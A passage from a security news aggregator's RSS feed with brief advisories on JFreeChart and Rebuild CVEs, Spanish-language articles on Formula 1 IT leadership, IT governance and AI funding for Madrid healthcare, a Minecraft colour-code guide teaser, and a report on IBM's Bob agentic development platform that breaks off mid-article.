This vulnerability is handled as CVE-2024-23077. The attack can only be done within the local networ...]]></description>
<link>https://tsecurity.de/de/3662147/sicherheitsluecken/cve-2024-23077-jfreechart-154-compassplotjava-memory-corruption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662147/sicherheitsluecken/cve-2024-23077-jfreechart-154-compassplotjava-memory-corruption/</guid>
<pubDate>Sat, 11 Jul 2026 18:26:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/jfreechart">JFreeChart 1.5.4</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function of the file <em>/chart/plot/CompassPlot.java</em>. This manipulation causes memory corruption.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2024-23077">CVE-2024-23077</a>. The attack can only be done within the local network. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-23076 | FreeChart 1.5.4 BubbleXYItemLabelGenerator.java null pointer dereference]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in FreeChart 1.5.4. Affected is an unknown function of the file /labels/BubbleXYItemLabelGenerator.java. The manipulation leads to null pointer dereference.

This vulnerability is documented as CVE-2024-23076. The attack requires being o...]]></description>
<link>https://tsecurity.de/de/3662140/sicherheitsluecken/cve-2024-23076-freechart-154-bubblexyitemlabelgeneratorjava-null-pointer-dereference/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662140/sicherheitsluecken/cve-2024-23076-freechart-154-bubblexyitemlabelgeneratorjava-null-pointer-dereference/</guid>
<pubDate>Sat, 11 Jul 2026 18:26:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/freechart">FreeChart 1.5.4</a>. Affected is an unknown function of the file <em>/labels/BubbleXYItemLabelGenerator.java</em>. The manipulation leads to null pointer dereference.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2024-23076">CVE-2024-23076</a>. The attack requires being on the local network. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Software-Engineering-Tage der Informatik Aktuell: Konferenz für Software-Entwicklung und ...]]></title>
<description><![CDATA[IT-Security · DevOps · Datenbanken · Java. ☰. Entwicklung · Betrieb · Management ... Sicherheit und nachhaltige IT-Strategien. Eberhard ...]]></description>
<link>https://tsecurity.de/de/3662085/it-security-nachrichten/software-engineering-tage-der-informatik-aktuell-konferenz-fuer-software-entwicklung-und/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662085/it-security-nachrichten/software-engineering-tage-der-informatik-aktuell-konferenz-fuer-software-entwicklung-und/</guid>
<pubDate>Sat, 11 Jul 2026 17:37:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>IT</b>-<b>Security</b> · DevOps · Datenbanken · Java. ☰. Entwicklung · Betrieb · Management ... Sicherheit und nachhaltige IT-Strategien. Eberhard ...]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-25294 | Rebuild 3.5 URL Parameter FileDownloader.java proxyDownload server-side request forgery]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in Rebuild 3.5. This affects the function proxyDownload of the file FileDownloader.java of the component URL Parameter Handler. Performing a manipulation results in server-side request forgery.

This vulnerability is cataloged as CVE-2024-2529...]]></description>
<link>https://tsecurity.de/de/3661803/sicherheitsluecken/cve-2024-25294-rebuild-35-url-parameter-filedownloaderjava-proxydownload-server-side-request-forgery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661803/sicherheitsluecken/cve-2024-25294-rebuild-35-url-parameter-filedownloaderjava-proxydownload-server-side-request-forgery/</guid>
<pubDate>Sat, 11 Jul 2026 14:08:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/rebuild">Rebuild 3.5</a>. This affects the function <code>proxyDownload</code> of the file <em>FileDownloader.java</em> of the component <em>URL Parameter Handler</em>. Performing a manipulation results in server-side request forgery.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2024-25294">CVE-2024-25294</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Así es como un director de TI de Fórmula 1 logra el equilibrio entre innovación y estabilidad a más de 300 km/h]]></title>
<description><![CDATA[Michael Taylor lleva 25 temporadas en el equipo Mercedes-AMG Petronas de Fórmula 1, donde ha desempeñado todas las funciones relacionadas con las tecnologías de la información, desde el apoyo en pista hasta los sistemas de ingeniería y la transformación empresarial. En la actualidad, como directo...]]></description>
<link>https://tsecurity.de/de/3659504/it-nachrichten/as-es-como-un-director-de-ti-de-frmula-1-logra-el-equilibrio-entre-innovacin-y-estabilidad-a-ms-de-300-kmh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659504/it-nachrichten/as-es-como-un-director-de-ti-de-frmula-1-logra-el-equilibrio-entre-innovacin-y-estabilidad-a-ms-de-300-kmh/</guid>
<pubDate>Fri, 10 Jul 2026 13:17:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Michael Taylor lleva 25 temporadas en el equipo Mercedes-AMG Petronas de Fórmula 1, donde ha desempeñado todas las funciones relacionadas con las tecnologías de la información, desde el apoyo en pista hasta los sistemas de ingeniería y la transformación empresarial. En la actualidad, como director de TI, dirige un equipo de 18 personas responsable de una de las operaciones con mayor volumen de datos del mundo.</p>



<p>Cuando un coche sale del box, lleva 300 sensores. Mientras está en marcha, genera más de un millón de puntos de datos por segundo. Cada componente, sistema y vuelta produce datos de telemetría que los ingenieros utilizan para ganar fracciones de segundo: la diferencia entre ganar y perder. “La Fórmula 1 lleva muchos años centrada en los datos. La métrica clave en nuestro deporte es el cronómetro, y así ha sido desde que comenzó el Campeonato del Mundo en la década de 1950. Pero ahora lo medimos todo. Si lo mides, puedes mejorarlo”, cuenta.</p>



<p>El reto no es recopilar datos —la Fórmula 1 lleva transmitiendo telemetría en directo desde la década de 1980—. Se trata de tomar decisiones a gran velocidad sin dejar de mantener el control que permite que una operación compleja y de alto riesgo siga funcionando.</p>



<p>Para los CIO que se enfrentan a la presión de avanzar rápidamente en materia de IA al tiempo que gestionan el riesgo, la seguridad y la calidad de los datos, las lecciones que Taylor ha aprendido a base de mucho esfuerzo en el <em>pit lane</em> ofrecen un marco útil: cómo equilibrar la velocidad y el control, cuándo mantener a las personas al tanto de lo que ocurre y por qué una gobernanza “suficientemente buena” es mejor que una gobernanza perfecta que nunca llega a ponerse en práctica.</p>



<h2 class="wp-block-heading">Innovación frente a estabilidad: “Una batalla constante”</h2>



<p>En la mayoría de las empresas, la tensión entre innovación y control se desarrolla a lo largo de trimestres o años. En la F1, ocurre cada semana. “Es realmente difícil. Y es algo que no siempre acertamos. Aquí es donde confiamos en las personas. La experiencia en el sector es realmente importante a la hora de tomar decisiones relacionadas con el cambio”, admite Taylor.</p>



<p>El equipo opera en dos modos distintos. Entre carrera y carrera, se encuentran en la fábrica de Brackley, en el Reino Unido. Las instalaciones, que son la sede central del diseño, la fabricación y el funcionamiento de sus monoplazas de Fórmula 1, ganadores de campeonatos, incluyen un campus tecnológico de 60 000 metros cuadrados. Todo gira en torno a la gestión de proyectos y programas, con margen para la experimentación. Pero a medida que se acerca el fin de semana de carrera, todo se centra en la ejecución.</p>



<p>“Tenemos ese modo normal cuando no estamos compitiendo. Volvemos a la fábrica para diseñar, construir y mejorar”, explica el directivo. “Pero a medida que nos acercamos al fin de semana de carrera, pasamos a ejecutar todo ello de la forma más eficaz. No debemos realizar cambios que afecten a los ingenieros”.</p>



<p>Esta dualidad marca todas las decisiones tecnológicas. La misma agilidad que impulsa la innovación durante la semana debe dar paso a la estabilidad cuando los resultados están en juego. Taylor lo llama una “batalla constante”.</p>



<h2 class="wp-block-heading">Modernización a la velocidad de las carreras</h2>



<p>Mercedes-AMG Petronas llevaba utilizando SAP desde 1999. La plataforma sustenta todo el proceso del equipo, desde el diseño hasta la pista: desde la aprobación del diseño, pasando por la planificación, el aprovisionamiento, la fabricación, las pruebas y el desarrollo, hasta el montaje del coche en la pista.</p>



<p>“Todos esos pasos son procesos fundamentales”, afirma Taylor. Por eso, cuando llegó el momento de modernizarse, el equipo lo abordó como una parada en <em>boxes</em>: planificado al segundo, ejecutado con precisión. Eligieron RISE with SAP —el paquete combinado de ERP en la nube y migración del proveedor—, acordaron iniciar el proceso en diciembre de 2024 y fijaron como objetivo la puesta en marcha en agosto de 2025, coincidiendo con el parón obligatorio de dos semanas del deporte.</p>



<p>“Es el momento perfecto para introducir cambios. Tenemos que planificarlo todo a la perfección para que todo vaya sobre ruedas cuando volvamos a competir”»”, explica.</p>



<p>Terminaron ocho semanas antes de lo previsto. “Somos unos obsesionados del control debido a la naturaleza de este deporte y a sus plazos estrictos”, afirma. Su equipo prefiere gestionar los sistemas de forma interna en lugar de depender de grandes integradores de sistemas que “se asoman un poco y desaparecen”. Con solo 18 personas en el equipo de TI, recurren a la experiencia de SAP para problemas específicos y, a continuación, retoman las riendas. “Una vez hecho esto, seguimos siendo los responsables y nos encargamos de la gestión”, agrega, “y SAP hace lo que mejor sabe hacer”.</p>



<h2 class="wp-block-heading">El camino seguro debe ser el más fácil</h2>



<p>La propiedad intelectual en la Fórmula 1 tiene una vida útil muy corta. En cuanto un nuevo componente se monta en el coche y se fotografía en el pit lane, los competidores pueden verlo. Pero eso no resta valor a lo que hay detrás.</p>



<p>“La verdadera ventaja no es solo la pieza”, afirma Taylor. “Es el razonamiento, el modelado, la simulación, los modos de fallo, las compensaciones y la dirección de desarrollo que hay detrás”.</p>



<p>Proteger todo eso requiere una estrategia de seguridad ofensiva. El responsable de seguridad de la información de Taylor depende directamente de él, y el equipo pone a prueba activamente sus propias defensas. “Actúa, piensa y trabaja como un hacker. Estamos pensando en cómo podemos contrarrestar las amenazas sin que ello afecte a los usuarios finales”, relata.</p>



<p>En una cultura que fomenta la ingeniería y en la que se da libertad a las personas para actuar con rapidez, una seguridad demasiado estricta resulta contraproducente. Taylor aprendió pronto que la perfección es enemiga del progreso. “Si la seguridad se interpone en el camino del negocio, este encontrará formas de sortearla. La tarea no consiste en ralentizar a la organización, sino en hacer que el camino seguro sea el más fácil”.</p>



<h2 class="wp-block-heading">El factor humano</h2>



<p>Dada la evolución semanal de la IA, el equipo de Taylor está llevando a cabo proyectos piloto en toda la organización: aprendizaje automático para la simulación, flujos de trabajo automatizados en la planificación de la producción y copilotos que ayudan a los desarrolladores a escribir código. Pero se resiste a la tentación de precipitarse.</p>



<p>“Todavía estamos buscando nuestro camino”, afirma. “No hay una solución única para todos. Estamos probando todo lo que hay disponible, pero dentro de seis a diez meses tomaremos decisiones sobre qué ampliar”.</p>



<p>A pesar del revuelo que rodea a la IA basada en agentes, Taylor sigue apostando por la supervisión humana. “Sigo creyendo firmemente que ‘los humanos deben estar en el bucle’. Cuando nuestra plantilla esté en sintonía con la IA, ahí es donde veremos el beneficio real: cuando esta complemente a nuestra gente”.</p>



<p>La IA también ha elevado el listón en materia de gobernanza de datos. “Lo que ahora se considera ‘suficientemente bueno’ incluye una mayor visibilidad, permisos más claros y una propiedad más definida», explica Taylor. «Hay que ser más riguroso a la hora de determinar a qué datos puede acceder la IA”.</p>



<h2 class="wp-block-heading">La clave, empezar por las consecuencias</h2>



<p>El consejo de Taylor para los CIO de otros sectores que se enfrentan a cuestiones similares es aparentemente sencillo: “Empieza por las consecuencias, no por la tecnología”.</p>



<p>En los servicios financieros, podría tratarse de un perjuicio para el cliente o de un incumplimiento normativo. En la sanidad, de la seguridad del paciente o de la pérdida de la confianza pública. En la F1, la consecuencia de un fallo de seguridad es la pérdida de la ventaja competitiva.</p>



<p>“Una vez que comprendes las consecuencias, puedes decidir qué requiere un control más estricto, qué hay que supervisar, qué hay que conservar y qué simplemente necesita mejores prácticas de seguridad”, afirma Taylor.</p>



<p>Es una lección aprendida a lo largo de 25 temporadas al límite de lo técnicamente posible, donde las decisiones se toman en milisegundos y el margen entre el éxito y el fracaso se mide en fracciones de segundo.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gobierno de TI: el factor decisivo para que la IA no desborde a las organizaciones]]></title>
<description><![CDATA[La carrera por incorporar inteligencia artificial (IA) a los procesos empresariales está avanzando a una velocidad que muchas organizaciones tienen dificultades para controlar. La presión por innovar, automatizar y obtener ventajas competitivas está obligando a las compañías a replantearse una di...]]></description>
<link>https://tsecurity.de/de/3659047/it-nachrichten/gobierno-de-ti-el-factor-decisivo-para-que-la-ia-no-desborde-a-las-organizaciones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659047/it-nachrichten/gobierno-de-ti-el-factor-decisivo-para-que-la-ia-no-desborde-a-las-organizaciones/</guid>
<pubDate>Fri, 10 Jul 2026 10:02:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>La carrera por incorporar inteligencia artificial (IA) a los procesos empresariales está avanzando a una velocidad que muchas organizaciones tienen dificultades para controlar. La presión por innovar, automatizar y obtener ventajas competitivas está obligando a las compañías a replantearse una disciplina que durante años ha permanecido en un segundo plano: el gobierno de TI.</p>



<p>La necesidad es cada vez más evidente. Según un estudio del IBM Institute for Business Value publicado en 2026, el 77% de las organizaciones reconoce que la adopción de la IA está avanzando más rápido que sus capacidades de gobierno.</p>



<p>Aunque el concepto de gobierno de TI es muy anterior a la irrupción de la IA, el actual escenario tecnológico ha elevado su importancia estratégica. Ya no se trata únicamente de controlar proyectos o presupuestos tecnológicos, sino de asegurar que la innovación se desarrolla bajo criterios de valor, riesgo y alineamiento empresarial.</p>



<p>“El gobierno de TI ayuda a garantizar que la organización esté tomando buenas decisiones y que esa capacidad para decidir correctamente forme parte del trabajo diario”, explica Sharon Stufflebeme, directora de soluciones para CIO en Protiviti.</p>



<h2 class="wp-block-heading">Del control tecnológico a la gobernanza empresarial</h2>



<p>Los especialistas coinciden en que el gobierno de TI ha evolucionado desde una función eminentemente operativa hacia una disciplina estrechamente vinculada al gobierno corporativo.</p>



<p>Para Bill Briggs, CTO de Deloitte Consulting y responsable ejecutivo del programa global para CIO de la firma, el gobierno de TI es el mecanismo que permite gestionar de manera consciente las inversiones tecnológicas y medir su contribución al crecimiento empresarial.</p>



<p>Y añade: “Se trata de formalizar las decisiones sobre gasto e inversiones, diferenciar entre mantener la operativa y generar crecimiento, y garantizar que lo prometido es lo que finalmente se entrega”.</p>



<p>Esa visión resulta especialmente relevante en un momento en el que los consejos de administración están demandando una mayor visibilidad sobre el retorno de las inversiones digitales, mientras aumenta la preocupación por los riesgos asociados a tecnologías emergentes como la IA generativa.</p>



<h2 class="wp-block-heading">Un reto todavía pendiente para muchas organizaciones</h2>



<p>A pesar de su relevancia, los expertos advierten de que la madurez en materia de gobierno de TI sigue siendo desigual.</p>



<p>Las grandes corporaciones, las empresas cotizadas y los sectores altamente regulados suelen disponer de estructuras formales de gobierno. Sin embargo, las organizaciones medianas y muchas compañías privadas continúan mostrando importantes carencias.</p>



<p>Incluso entre las empresas que han implantado programas de gobierno de TI, no siempre se obtienen los resultados esperados. La fragmentación tecnológica, las decisiones aisladas por áreas de negocio, la falta de comunicación y la escasa aplicación efectiva de las políticas son algunos de los problemas más frecuentes.</p>



<p>Nehawa Ngundam Abam, analista de gobierno y riesgos de TI en la aseguradora Starr y miembro del grupo de tendencias emergentes de ISACA, considera que la creciente complejidad tecnológica hace que la disciplina sea hoy más crítica que nunca.</p>



<p>“Sin un gobierno eficaz, TI puede fragmentarse fácilmente, perder alineación con los objetivos empresariales e introducir riesgos de ciberseguridad, cumplimiento normativo y reputacionales”, afirma.</p>



<h2 class="wp-block-heading">Los cinco pilares sobre los que se sustenta el gobierno de TI</h2>



<p>Aunque existen diferentes aproximaciones metodológicas, los principales marcos coinciden en cinco grandes áreas de actuación:</p>



<p>· Alineación estratégica.</p>



<p>· Entrega y generación de valor.</p>



<p>· Gestión del riesgo.</p>



<p>· Gestión de recursos.</p>



<p>· Gestión del rendimiento.</p>



<p>La prioridad de estos pilares ha cambiado con la irrupción de la IA.</p>



<p>Según Stufflebeme, la alineación estratégica y la gestión del valor se han convertido en elementos especialmente críticos. La pregunta que deben responder los CIO ya no es únicamente qué tecnología implantar, sino cómo garantizar que cada inversión contribuye a los objetivos de negocio.</p>



<p>Al mismo tiempo, la gestión del riesgo adquiere una dimensión renovada al conectar directamente con los programas corporativos de gobierno, riesgo y cumplimiento (GRC), especialmente en ámbitos como la protección de datos, la resiliencia operativa, la continuidad de negocio o el uso responsable de la IA.</p>



<h2 class="wp-block-heading">COBIT, ITIL e ISO 38500 siguen marcando el camino</h2>



<p>Para estructurar sus programas de gobierno, la mayoría de las organizaciones continúa apoyándose en marcos de referencia consolidados.</p>



<p>COBIT, desarrollado por ISACA, mantiene su posición como uno de los referentes globales para gobierno y gestión de TI, especialmente en ámbitos relacionados con el control y la gestión de riesgos.</p>



<p>Por su parte, ITIL sigue siendo una de las metodologías más extendidas para gestionar servicios tecnológicos y garantizar que los procesos de TI responden a las necesidades del negocio.</p>



<p>En el ámbito del gobierno corporativo, ISO/IEC 38500 proporciona principios para que consejos de administración y equipos directivos supervisen el uso de la tecnología desde una perspectiva estratégica.</p>



<p>Junto a ellos, modelos como CMMI o FAIR están ganando protagonismo en áreas específicas relacionadas con la madurez organizativa y la cuantificación del riesgo.</p>



<p>El verdadero desafío: integrar la gobernanza en el día a día</p>



<p>Sin embargo, los especialistas coinciden en que los marcos, por sí solos, no garantizan un buen gobierno.</p>



<p>“El problema aparece cuando las organizaciones utilizan los marcos únicamente para cumplir requisitos o marcar casillas”, advierte Stufflebeme.</p>



<p>La diferencia entre una organización madura y otra que simplemente cumple procedimientos radica en que los controles formen parte natural de la operativa diaria.</p>



<p>En este punto, la automatización y la IA pueden convertirse en aliados. Marco Bill, vicepresidente senior y CIO de Red Hat, señala que cada vez más organizaciones están incorporando controles directamente en los sistemas para facilitar el cumplimiento sin ralentizar los procesos.</p>



<p>La tendencia apunta hacia modelos de supervisión continua basados en automatización, monitorización en tiempo real y cuadros de mando que permitan detectar desviaciones antes de que se conviertan en problemas de negocio.</p>



<h2 class="wp-block-heading">La gobernanza de la IA exige un enfoque específico</h2>



<p>Uno de los debates que está ganando fuerza entre los CIO es si la IA debe gobernarse dentro de los marcos tradicionales o mediante estructuras independientes.</p>



<p>Thomas Phelps, CIO y vicepresidente senior de estrategia corporativa de Laserfiche, apuesta por una aproximación híbrida.</p>



<p>Según explica, la gobernanza de la IA debe estar integrada dentro del gobierno de TI, pero requiere una atención específica debido a la velocidad con la que evoluciona la tecnología y a los nuevos riesgos que introduce.</p>



<p>La aparición de normativas como el Reglamento Europeo de Inteligencia Artificial (AI Act) refuerza esta necesidad y obliga a las organizaciones a desarrollar mecanismos de supervisión mucho más dinámicos que los utilizados tradicionalmente en otras áreas tecnológicas.</p>



<p>Una responsabilidad que supera al departamento de TI</p>



<p>La principal conclusión de los expertos es que el gobierno de TI ha dejado de ser una responsabilidad exclusiva del CIO.</p>



<p>La creciente dependencia tecnológica de las empresas, la expansión de la inteligencia artificial y la presión regulatoria están impulsando una nueva concepción de la gobernanza, donde tecnología, negocio, riesgos, cumplimiento y dirección corporativa deben trabajar de forma conjunta.</p>



<p>Porque, como resume Briggs, el éxito llega cuando el gobierno de TI deja de percibirse como una función del departamento tecnológico y pasa a entenderse como una parte esencial del gobierno de toda la organización.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[La sanidad pública madrileña integrará la IA gracias a una inyección estatal de 12,8 millones de euros]]></title>
<description><![CDATA[Implantar programas de monitorización remota de patologías crónicas, el uso de analítica avanzada en salud, el desarrollo de casos de uso basados en inteligencia artificial y facilitar la implementación de programas de telecuidados son algunas de las acciones que se realizarán bajo el marco del a...]]></description>
<link>https://tsecurity.de/de/3658994/it-security-nachrichten/la-sanidad-pblica-madrilea-integrar-la-ia-gracias-a-una-inyeccin-estatal-de-128-millones-de-euros/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658994/it-security-nachrichten/la-sanidad-pblica-madrilea-integrar-la-ia-gracias-a-una-inyeccin-estatal-de-128-millones-de-euros/</guid>
<pubDate>Fri, 10 Jul 2026 09:35:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Implantar programas de monitorización remota de patologías crónicas, el uso de analítica avanzada en salud, el desarrollo de casos de uso basados en inteligencia artificial y facilitar la implementación de programas de telecuidados son algunas de las acciones que se realizarán bajo el marco del acuerdo sellado en el ámbito del Sistema Nacional de Salud entre el Ministerio para la Transformación Digital y de la Función Pública, el Ministerio de Sanidad y la Comunidad de Madrid.</p>



<p>En virtud de este convenio, de una duración de cuatro años (con posibilidad de prórroga por otros cuatro), el Gobierno español destinará 12,8 millones de euros a incorporar la IA a la Sanidad Pública de la Comunidad de Madrid. El montante, reza un comunicado del Ejecutivo, “permitirá incorporar nuevos servicios digitales en 262 centros públicos, desarrollar casos de usos de la IA innovadores y beneficiará cada año a más de 155.000 usuarios de la sanidad pública madrileña”. El proyecto se enmarca en la Estrategia de Salud Digital del Sistema Nacional de Salud y en el Programa Operativo Plurirregional de España (POPE) 2021-2027, financiado con fondos europeos FEDER.</p>



<p>“Este Gobierno está convencido de que la IA, como infraestructura de país, es una oportunidad con todas las letras”, señaló el ministro para la Transformación Digital y de la Función Pública, Óscar López, durante la firma. “Con este convenio damos un nuevo impulso a la transformación digital del Sistema Nacional de Salud para que la innovación llegue a todos los ciudadanos, vivan donde vivan”, agregó la ministra de Sanidad, Mónica García. “Movilizamos 223 millones de euros hasta 2029 para impulsar una inteligencia artificial útil, segura y responsable, compartir imágenes médicas entre comunidades autónomas y reforzar una sanidad más coordinada, más eficiente y más equitativa”.</p>



<p>Por su parte, el consejero de Digitalización de la Comunidad de Madrid, Miguel López-Valverde, recordó que “la región ya ha ejecutado 2.371 millones de euros del Plan de Recuperación, el 73% de los recursos asignados, situándose entre las comunidades más ágiles en la movilización de estas inversiones, muy por delante de Cataluña y Andalucía”.</p>



<p>Otras iniciativas que contempla el convenio son herramientas para mejorar el diagnóstico y el seguimiento de enfermedades raras; programas de telecuidados, que facilitarán el avance hacia una asistencia más personalizada y accesible, y la extensión de la red ÚNICAS, liderada estratégicamente por la Comunidad de Madrid junto con Cataluña, que permite compartir información clínica entre centros especializados en patologías minoritarias de pacientes pediátricos.</p>



<p>Además, el Ejecutivo autonómico participará en la Red de Intercambio de Imágenes Médicas del Sistema Nacional de Salud (SNS) para permitir el intercambio de este tipo de pruebas entre regiones para la prestación asistencial y su uso secundario, en línea con el reglamento del Espacio Europeo de Datos de Salud.</p>



<p>El convenio determina que, una vez desarrollados los proyectos financiados en este marco, se pondrán a disposición de todas las administraciones sanitarias a través de un repositorio o catálogo gestionado por el Ministerio de Sanidad, con el objetivo de su reutilización. Las actuaciones seguirán las directrices y recomendaciones que puedan ser establecidas por la Agencia Española de Supervisión de la Inteligencia Artificial (AESIA) y otros organismos competentes.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Minecraft Color Codes: Ultimate 16-Color Easy Guide]]></title>
<description><![CDATA[Minecraft color codes let you change the color and style of text on signs, in chat, and in commands — in both Java Edition and Bedrock Edition. Understanding Minecraft color codes is essential for anyone who wants to customize their in-game text. This guide covers every code you need, how to ente...]]></description>
<link>https://tsecurity.de/de/3658842/betriebssysteme/minecraft-color-codes-ultimate-16-color-easy-guide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658842/betriebssysteme/minecraft-color-codes-ultimate-16-color-easy-guide/</guid>
<pubDate>Fri, 10 Jul 2026 07:50:55 +0200</pubDate>
<category>🖥️  Betriebssysteme</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Minecraft color codes let you change the color and style of text on signs, in chat, and in commands — in both Java Edition and Bedrock Edition. Understanding Minecraft color codes is essential for anyone who wants to customize their in-game text. This guide covers every code you need, how to enter the section symbol […]</p>
<p>The post <a rel="nofollow" href="https://www.addictivetips.com/gaming/change-text-color-for-signs-in-minecraft/">Minecraft Color Codes: Ultimate 16-Color Easy Guide</a> appeared first on <a rel="nofollow" href="https://www.addictivetips.com/">AddictiveTips</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IBM Bob expands beyond code generation to orchestrate the entire SDLC]]></title>
<description><![CDATA[Enterprises are using AI to write more code than ever before; anywhere between 25% and 75%, depending on who you ask. This means developers are moving to other parts of the process, where they run into whole new sets of problems.



IBM rolled out its IBM Bob agentic software development platform...]]></description>
<link>https://tsecurity.de/de/3658483/ai-nachrichten/ibm-bob-expands-beyond-code-generation-to-orchestrate-the-entire-sdlc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658483/ai-nachrichten/ibm-bob-expands-beyond-code-generation-to-orchestrate-the-entire-sdlc/</guid>
<pubDate>Fri, 10 Jul 2026 03:02:42 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Enterprises are using AI to write more code than ever before; anywhere between <a href="https://www.infoworld.com/article/4176534/ai-coding-agents-need-good-software-engineers.html" target="_blank">25% and 75%</a>, depending on who you ask. This means developers are moving to other parts of the process, where they run into whole new sets of problems.</p>



<p>IBM rolled out its IBM Bob agentic software development platform earlier this year to help developers across the entire software development lifecycle (SDLC), rather than just in single interfaces or isolated tasks.</p>



<p>To build out the platform, IBM Thursday announced <a href="https://newsroom.ibm.com/2026-07-09-ibm-advances-enterprise-ai-software-development-with-multi-agent-capabilities-and-specialized-modernization-workflows" target="_blank" rel="noreferrer noopener">a series of updates</a>, including new multi-agent capabilities, parallel tool calling, and built-in cost and use analytics. The company also announced three specialized workflows geared specifically to Java modernization, its IBM i operating system (OS), and its mainframe architecture, IBM Z.</p>



<p>“What makes IBM Bob different is that IBM did not build it as another point coding assistant,” said <a href="https://www.ibm.com/think/author/michael-kwok" target="_blank" rel="noreferrer noopener">Michael Kwok</a>, VP of IBM Bob. “The market conversation has moved from ‘which model writes code fastest?’ to ‘which platform helps enterprises deliver software safely, repeatedly, and economically across the full lifecycle?’”</p>



<p>Bob is designed to address that broader problem, he said: understanding complex systems, planning changes, executing work, validating results, and giving leaders visibility into usage, governance, and cost. “IBM Bob supports the work around the code, as much as the code itself,” he said.</p>



<h2 class="wp-block-heading">Bob’s new features</h2>



<p>Bob, which was made <a href="https://newsroom.ibm.com/2026-04-28-introducing-ibm-bob-ai-development-partner-that-takes-enterprises-from-ai-assisted-coding-to-production-ready-software" target="_blank" rel="noreferrer noopener">globally available in April</a>, embeds agentic AI across the entire development process: discovery, planning, design, coding, testing, deployment, and operations. It offers different persona-based modes (‘Agent,’ ‘Plan,’ ‘Ask’), reusable playbooks, and enforced standards.</p>



<p>Bob can call tools to perform different tasks and route those tasks between different models, like IBM’s Granite or Anthropic’s Claude, based on cost, performance, and accuracy needs. It can also run several tasks simultaneously, each in its own thread. From a security standpoint, it scans sensitive data, enforces policy in real time, and incorporates red-teaming directly into development workflows.</p>



<p>“Enterprise software work is rarely a single prompt or a single file,” said Kwok, noting that it often requires repository discovery, dependency analysis, testing, security review, documentation, and human approval. “Bob coordinates that work, rather than leaving developers to stitch it together manually,” he said.</p>



<p>Now, rather than running each one separately, Bob can call model-native tools in parallel and run them simultaneously. This means that a task that previously took 30 seconds can now be done in 10 seconds or less, reducing token consumption per task, IBM says. Its context window is also larger (270K tokens compared to 200K in V1).</p>



<p>Additionally, Bob can pull in subagents to perform its exploratory steps. When the agent needs to do a self-contained task, like “figure out how authentication works in this codebase,” it spins up a subagent to read files, perform analysis, and work out patterns. The main agent then receives a summary, and the intermediate steps are thrown away, IBM says. This helps prevent context window bloat.</p>



<p>Parallel tool calling reduces waiting time for work that fans out across searches, file reads, and validation steps, Kwok explained, while subagents keep the main context cleaner by isolating exploratory work and returning concise summaries.</p>



<p>“The point is not that Bob can do more things at the same time; it’s that Bob can coordinate those things in a way that remains understandable, repeatable, and auditable,” he said.</p>



<h2 class="wp-block-heading">‘Bobalytics’ provides important metrics</h2>



